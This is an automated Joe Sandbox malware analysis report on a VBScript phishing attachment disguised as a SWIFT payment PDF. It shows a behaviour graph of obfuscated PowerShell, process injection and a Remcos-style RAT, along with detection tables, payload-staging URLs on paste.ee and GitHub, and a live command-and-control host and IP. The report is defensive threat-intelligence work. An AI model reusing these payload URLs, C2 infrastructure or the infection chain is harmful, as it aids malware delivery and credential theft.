            System Network Configuration Discovery            		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525550 Sample: SWIFT 103 20240611130143566... Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 89 paste.ee 2->89 91 ab9001.ddns.net 2->91 93 raw.githubusercontent.com 2->93 123 Multi AV Scanner detection for domain / URL 2->123 125 Suricata IDS alerts for network traffic 2->125 127 Found malware configuration 2->127 133 10 other signatures 2->133 12 wscript.exe 1 2->12         started        15 svchost.exe 1 2 2->15         started        signatures3 129 Connects to a pastebin service (likely for C&C) 89->129 131 Uses dynamic DNS services 91->131 process4 signatures5 153 VBScript performs obfuscated calls to suspicious functions 12->153 155 Suspicious powershell command line found 12->155 157 Wscript starts Powershell (via cmd or directly) 12->157 159 3 other signatures 12->159 17 powershell.exe 7 12->17         started        20 cmd.exe 1 12->20         started        22 chrome.exe 12->22         started        process6 dnsIp7 113 Suspicious powershell command line found 17->113 115 Obfuscated command line found 17->115 25 powershell.exe 14 15 17->25         started        29 conhost.exe 17->29         started        117 Wscript starts Powershell (via cmd or directly) 20->117 119 Uses ping.exe to sleep 20->119 121 Uses ping.exe to check the status of other devices and networks 20->121 31 powershell.exe 7 20->31         started        33 PING.EXE 1 20->33         started        35 conhost.exe 20->35         started        101 mdec.nelreports.net 22->101 103 js.monitor.azure.com 22->103 105 12 other IPs or domains 22->105 signatures8 process9 dnsIp10 107 paste.ee 188.114.97.3, 443, 49718 CLOUDFLARENETUS European Union 25->107 109 raw.githubusercontent.com 185.199.110.133, 443, 49705 FASTLYUS Netherlands 25->109 143 Writes to foreign memory regions 25->143 145 Injects a PE file into a foreign processes 25->145 37 AddInProcess32.exe 3 3 25->37         started        147 Suspicious powershell command line found 31->147 149 Obfuscated command line found 31->149 151 Found suspicious powershell code related to unpacking or dynamic code loading 31->151 111 127.0.0.1 unknown unknown 33->111 signatures11 process12 dnsIp13 99 ab9001.ddns.net 64.188.16.157, 23782, 55396, 55594 ASN-QUADRANET-GLOBALUS United States 37->99 87 C:\ProgramData\remcos\logs.dat, data 37->87 dropped 135 Contains functionalty to change the wallpaper 37->135 137 Contains functionality to steal Chrome passwords or cookies 37->137 139 Contains functionality to inject code into remote processes 37->139 141 6 other signatures 37->141 42 svchost.exe 13 37->42         started        44 svchost.exe 37->44         started        46 svchost.exe 37->46         started        48 10 other processes 37->48 file14 signatures15 process16 process17 50 chrome.exe 8 42->50         started        53 chrome.exe 42->53         started        55 conhost.exe 42->55         started        57 chrome.exe 44->57         started        59 chrome.exe 44->59         started        61 conhost.exe 44->61         started        63 chrome.exe 46->63         started        65 2 other processes 46->65 67 29 other processes 48->67 dnsIp18 95 192.168.2.5, 23782, 443, 49157 unknown unknown 50->95 97 239.255.255.250 unknown Reserved 50->97 69 chrome.exe 53->69         started        71 chrome.exe 57->71         started        73 chrome.exe 59->73         started        75 chrome.exe 63->75         started        77 chrome.exe 65->77         started        79 chrome.exe 67->79         started        81 chrome.exe 67->81         started        83 chrome.exe 67->83         started        85 16 other processes 67->85 process19

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SWIFT 103 202406111301435660 110624-pdf.vbs8%VirustotalBrowse
            SWIFT 103 202406111301435660 110624-pdf.vbs5%ReversingLabsWin32.Trojan.Generic

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            s-part-0016.t-0009.t-msedge.net0%VirustotalBrowse
            paste.ee1%VirustotalBrowse
            raw.githubusercontent.com0%VirustotalBrowse
            s-part-0017.t-0009.t-msedge.net0%VirustotalBrowse
            s-part-0017.t-0009.fb-t-msedge.net0%VirustotalBrowse
            www.google.com0%VirustotalBrowse
            ab9001.ddns.net16%VirustotalBrowse
            js.monitor.azure.com0%VirustotalBrowse
            s-part-0032.t-0009.t-msedge.net0%VirustotalBrowse
            mdec.nelreports.net0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://contoso.com/License0%URL Reputationsafe
            https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
            http://polymer.github.io/AUTHORS.txt0%URL Reputationsafe
            http://geoplugin.net/json.gp/C0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://oneget.orgX0%URL Reputationsafe
            http://polymer.github.io/CONTRIBUTORS.txt0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            http://polymer.github.io/PATENTS.txt0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js0%URL Reputationsafe
            https://schema.org0%URL Reputationsafe
            http://polymer.github.io/LICENSE.txt0%URL Reputationsafe
            http://geoplugin.net/json.gp0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            https://oneget.org0%URL Reputationsafe
            https://www.linkedin.com/cws/share?url=$0%VirustotalBrowse
            https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf0%VirustotalBrowse
            https://github.com/Youssef13130%VirustotalBrowse
            https://paste.ee1%VirustotalBrowse
            https://aka.ms/msignite_docs_banner0%VirustotalBrowse
            https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml0%VirustotalBrowse
            https://go.microsoft.co1%VirustotalBrowse
            https://www.google.com0%VirustotalBrowse
            https://analytics.paste.ee1%VirustotalBrowse
            ab9001.ddns.net16%VirustotalBrowse
            https://aka.ms/pshelpmechoose0%VirustotalBrowse
            https://aka.ms/feedback/report?space=610%VirustotalBrowse
            https://management.azure.com/subscriptions?api-version=2016-06-010%VirustotalBrowse
            https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md0%VirustotalBrowse
            https://cdnjs.cloudflare.com0%VirustotalBrowse
            https://learn-video.azurefd.net/vod/player0%VirustotalBrowse
            https://github.com/gewarren0%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
            https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt6%VirustotalBrowse
            https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db7250%VirustotalBrowse
            https://secure.gravatar.com0%VirustotalBrowse
            https://client-api.arkoselabs.com/v2/api.js0%VirustotalBrowse
            https://github.com/Thraka0%VirustotalBrowse
            https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev0%VirustotalBrowse
            http://paste.ee1%VirustotalBrowse
            https://aka.ms/certhelp0%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
            https://paste.ee/d/XlUYO/06%VirustotalBrowse
            https://github.com/Pester/Pester1%VirustotalBrowse
            https://github.com/mairaw0%VirustotalBrowse
            https://aka.ms/yourcaliforniaprivacychoices0%VirustotalBrowse
            https://github.com/adegeo0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            s-part-0016.t-0009.t-msedge.net
            		13.107.246.44
            		truefalseunknown
            paste.ee
            		188.114.97.3
            		truetrueunknown
            raw.githubusercontent.com
            		185.199.110.133
            		truefalseunknown
            s-part-0017.t-0009.fb-t-msedge.net
            		13.107.253.45
            		truefalseunknown
            s-part-0017.t-0009.t-msedge.net
            		13.107.246.45
            		truefalseunknown
            www.google.com
            		142.250.184.196
            		truefalseunknown
            s-part-0032.t-0009.t-msedge.net
            		13.107.246.60
            		truefalseunknown
            ab9001.ddns.net
            		64.188.16.157
            		truetrueunknown
            js.monitor.azure.com
            		unknown
            		unknowntrueunknown
            mdec.nelreports.net
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            ab9001.ddns.nettrueunknown
            https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalseunknown
            https://paste.ee/d/XlUYO/0trueunknown
            https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
            • URL Reputation: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_187.15.drfalseunknown
            https://go.microsoft.copowershell.exe, 00000006.00000002.2499500566.000001CAD446B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://contoso.com/Licensepowershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_187.15.drfalse
              		unknown
              https://www.linkedin.com/cws/share?url=$chromecache_212.15.dr, chromecache_186.15.drfalseunknown
              https://analytics.paste.eepowershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000E.00000003.2301946567.000001C4FB120000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.14.dr, edb.log.14.drfalse
              • URL Reputation: safe
              		unknown
              https://paste.eepowershell.exe, 00000008.00000002.2302182137.00000180D8EC9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://github.com/Youssef1313chromecache_187.15.drfalseunknown
              https://aka.ms/msignite_docs_bannerchromecache_212.15.dr, chromecache_186.15.drfalseunknown
              https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_186.15.drfalse
                		unknown
                http://polymer.github.io/AUTHORS.txtchromecache_212.15.dr, chromecache_186.15.drfalse
                • URL Reputation: safe
                		unknown
                https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_187.15.drfalseunknown
                https://www.google.compowershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_212.15.dr, chromecache_186.15.drfalseunknown
                https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_187.15.drfalseunknown
                http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/pshelpmechoosechromecache_212.15.dr, chromecache_186.15.drfalseunknown
                https://aka.ms/feedback/report?space=61chromecache_187.15.drfalseunknown
                https://contoso.com/powershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2302182137.00000180DA4E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://oneget.orgXpowershell.exe, 00000008.00000002.2302182137.00000180DA20D000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://learn-video.azurefd.net/vod/playerchromecache_212.15.dr, chromecache_186.15.drfalseunknown
                https://cdnjs.cloudflare.compowershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://twitter.com/intent/tweet?original_referer=$chromecache_212.15.dr, chromecache_186.15.drfalse
                  		unknown
                  https://github.com/gewarrenchromecache_187.15.drfalseunknown
                  https://cdnjs.cloudflare.com;powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://polymer.github.io/CONTRIBUTORS.txtchromecache_212.15.dr, chromecache_186.15.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2173365893.00000194BA6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2457245723.000001CABC4EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8A91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://secure.gravatar.compowershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_187.15.drfalse
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2302182137.00000180DA4E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.2302182137.00000180DA20D000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_187.15.drfalseunknown
                      https://client-api.arkoselabs.com/v2/api.jschromecache_212.15.dr, chromecache_186.15.drfalseunknown
                      https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_212.15.dr, chromecache_186.15.drfalseunknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2302182137.00000180D8CB2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://paste.eepowershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://github.com/Thrakachromecache_187.15.drfalseunknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2302182137.00000180D8CB2000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://go.micropowershell.exe, 00000008.00000002.2302182137.00000180D9B54000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://polymer.github.io/PATENTS.txtchromecache_212.15.dr, chromecache_186.15.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://aka.ms/certhelpchromecache_212.15.dr, chromecache_186.15.drfalseunknown
                      https://www.google.com;powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://raw.githubusercontpowershell.exe, 00000008.00000002.2302182137.00000180DA1B7000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://crl.ver)svchost.exe, 0000000E.00000002.3369902405.000001C4FB200000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://github.com/mairawchromecache_187.15.drfalseunknown
                            https://schema.orgchromecache_186.15.drfalse
                            • URL Reputation: safe
                            		unknown
                            http://polymer.github.io/LICENSE.txtchromecache_212.15.dr, chromecache_186.15.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2302182137.00000180D8CB2000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://aka.ms/yourcaliforniaprivacychoiceschromecache_187.15.drfalseunknown
                            http://geoplugin.net/json.gpAddInProcess32.exefalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/nschonnichromecache_187.15.drfalse
                              		unknown
                              https://g.live.com/odclientsettings/Prod/C:edb.log.14.drfalse
                                		unknown
                                https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_212.15.dr, chromecache_186.15.drfalse
                                  		unknown
                                  https://github.com/adegeochromecache_187.15.drfalseunknown
                                  https://raw.githubusercontent.compowershell.exe, 00000008.00000002.2302182137.00000180D8CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D9E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://github.com/jonschlinkert/is-plain-objectchromecache_212.15.dr, chromecache_186.15.drfalse
                                      		unknown
                                      https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtJhu;powershell.exe, 00000008.00000002.2302182137.00000180D8CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D9E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://octokit.github.io/rest.js/#throttlingchromecache_212.15.dr, chromecache_186.15.drfalse
                                          		unknown
                                          http://raw.githubusercontent.compowershell.exe, 00000008.00000002.2302182137.00000180DA1BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://aka.ms/aiskillschallenge/T1LearnBanner?wt.mc_id=aisc25_learnpromo1_website_cnlchromecache_212.15.dr, chromecache_186.15.drfalse
                                              		unknown
                                              https://analytics.paste.ee;powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0chromecache_212.15.dr, chromecache_186.15.drfalse
                                                  		unknown
                                                  https://github.com/js-cookie/js-cookiechromecache_212.15.dr, chromecache_186.15.drfalse
                                                    		unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000005.00000002.2173365893.00000194BA727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2173365893.00000194BA747000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2457245723.000001CABC439000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2457245723.000001CABC44D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schema.org/Organizationchromecache_187.15.drfalse
                                                      		unknown
                                                      https://channel9.msdn.com/chromecache_212.15.dr, chromecache_186.15.drfalse
                                                        		unknown
                                                        https://themes.googleusercontent.compowershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://github.com/dotnet/trychromecache_212.15.dr, chromecache_186.15.drfalse
                                                            		unknown
                                                            https://oneget.orgpowershell.exe, 00000008.00000002.2302182137.00000180DA20D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            13.107.246.45
                                                            		s-part-0017.t-0009.t-msedge.netUnited States
                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            13.107.246.44
                                                            		s-part-0016.t-0009.t-msedge.netUnited States
                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            13.107.246.60
                                                            		s-part-0032.t-0009.t-msedge.netUnited States
                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            185.199.110.133
                                                            		raw.githubusercontent.comNetherlands
                                                            		54113FASTLYUSfalse
                                                            142.250.184.196
                                                            		www.google.comUnited States
                                                            		15169GOOGLEUSfalse
                                                            13.107.253.45
                                                            		s-part-0017.t-0009.fb-t-msedge.netUnited States
                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            64.188.16.157
                                                            		ab9001.ddns.netUnited States
                                                            		8100ASN-QUADRANET-GLOBALUStrue
                                                            188.114.97.3
                                                            		paste.eeEuropean Union
                                                            		13335CLOUDFLARENETUStrue
                                                            239.255.255.250
                                                            		unknownReserved
                                                            		unknownunknownfalse

                                                            Private

                                                            IP
                                                            192.168.2.5
                                                            127.0.0.1

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1525550
                                                            Start date and time:2024-10-04 11:32:40 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 10m 13s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:90
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:SWIFT 103 202406111301435660 110624-pdf.vbs
                                                            Detection:MAL
                                                            Classification:mal100.rans.troj.spyw.expl.evad.winVBS@257/82@15/11
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 53
                                                            • Number of non-executed functions: 188
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .vbs

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded IPs from analysis (whitelisted): 192.229.221.95, 93.184.221.240, 184.28.89.167, 142.250.184.238, 64.233.184.84, 216.58.206.67, 88.221.170.101, 34.104.35.123, 184.28.90.27, 142.250.186.106, 172.217.16.202, 172.217.18.106, 142.250.185.170, 172.217.18.10, 142.250.186.74, 142.250.186.42, 142.250.185.106, 142.250.186.138, 216.58.206.74, 142.250.185.74, 172.217.16.138, 216.58.212.138, 142.250.185.138, 216.58.212.170, 216.58.206.42, 52.168.117.171, 104.124.11.50, 104.124.11.18, 13.74.129.1, 13.107.21.237, 204.79.197.237, 20.189.173.24, 142.250.184.227, 52.182.143.210, 51.104.15.252, 142.250.186.142
                                                            • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, e16604.g.akamaiedge.net, onedscolprdeus16.eastus.cloudapp.azure.com, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, prod.fs.microsoft.com.akadns.net, onedscolprdcus10.centralus.cloudapp.azure.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.
                                                            • Execution Graph export aborted for target powershell.exe, PID 1076 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 1396 because it is empty
                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            05:33:46API Interceptor40x Sleep call for process: powershell.exe modified
                                                            05:33:57API Interceptor2x Sleep call for process: svchost.exe modified
                                                            05:34:26API Interceptor469505x Sleep call for process: AddInProcess32.exe modified

                                                            LLM Input / Output

                                                            InputOutput
                                                            URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 Model: jbxai
                                                            {
"brand":["unknown"],
"contains_trigger_text":false,
"prominent_button_name":"unknown",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
                                                            URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 Model: jbxai
                                                            {
"phishing_score":0,
"reason":"No text found on page."}
                                                            URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 Model: jbxai
                                                            {
"brand":["Microsoft"],
"contains_trigger_text":false,
"trigger_text":"",
"prominent_button_name":"Register now",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                                                            • nam.dcv.ms/BxPVLH2cz4
                                                            13.107.246.44https://1drv.ms/o/c/fdad16d5f2338a27/Eo8O_nGS-PdFnAhpolmsW1cBd-Jv5WSSl5AjZZuAQUSXNw?e=5%3aI9hXvq&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                              https://wvr4dgzxxavl6jjpq7rl.igortsaplin.pro/WFzFCiNxGet hashmaliciousHTMLPhisherBrowse
                                                                https://tecvia.ladesk.com/412763-SICHERE-GESCH%C3%84FTSDOKUMENTEGet hashmaliciousHTMLPhisherBrowse
                                                                  Play_VM-Now(Tina.lawvey)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    Swift_ach Complaints.sppgCQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      http://microsoft.biosency.com/Get hashmaliciousUnknownBrowse
                                                                        https://index-html.info/?rid=jhOgcp4Get hashmaliciousUnknownBrowse
                                                                          CLQD.htmGet hashmaliciousHTMLPhisherBrowse
                                                                            https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3BGet hashmaliciousUnknownBrowse
                                                                              https://0610ddce8f18f5a435e0067c7ddb3ec6.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
                                                                                • www.mimecast.com/Customers/Support/Contact-support/
                                                                                http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
                                                                                • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5
                                                                                185.199.110.133SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
